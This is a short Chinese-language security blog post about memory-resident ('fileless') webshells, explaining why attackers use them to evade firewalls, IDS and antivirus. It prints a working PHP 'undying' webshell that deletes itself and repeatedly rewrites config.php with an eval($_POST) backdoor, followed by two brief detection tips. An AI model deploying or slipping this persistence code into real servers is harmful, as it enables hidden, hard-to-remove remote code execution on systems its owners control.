内存马

0x01.为什么要用内存马

webshell根据功能划分：一句话、小马、大马；之后也出现了加密一句话；随后也有新的无文件webshell类型：内存马

传统Webshell连接方式，都是先通过某种漏洞将恶意的脚本木马文件上传，然后通过中国菜刀，或者蚁剑，冰蝎等Webshell管理软件进行链接

但是嘞，防火墙,IDS,IPS等安全设备很容易将这种设备捕获拦截，由于文件明文存储在服务器端，又容易被杀毒软件查杀；即使有 加密一句话木马，也有针对性的杀软。所以引入 内存马

0x02.什么是内存马

无文件webshell，就是说 服务器上不会存在需要链接的webshell脚本文件

其原理是：类似MVC架构，通过路由访问控制器；就是在web组件或者应用程序中，注册一层访问路由，访问者通过这层路由，来执行我们控制器中的代码

2.PHP内存马

2.1原理

php 内存马也就是 php 不死马，是将不死马启动后删除本身，在内存中执行死循环，使管理员无法删除木马文件

<?php
  set_time_limit(0);
  ignore_user_abort(1);
  unlink(__FILE__);
  while (1) {
  	$content = '<?php @eval($_POST["zzz"]) ?>';
  	file_put_contents("config.php", $content);
  	usleep(10000);
  }
?>

• ignore_user_abort：函数设置与客户机断开是否会终止脚本的执行，如果设置为 true，则忽略与用户的断开。
• set_time_limit：设置允许脚本运行的时间，单位为秒。如果设置为 0（零），没有时间方面的限制。

2.2 检测

• 检查所有 php 进程处理请求的持续时间
• 检测执行文件是否在文件系统真实存在

来源

https://mp.weixin.qq.com/s/IT8rftwtbNxJeVf04gr-pQ

Geekby’s Blog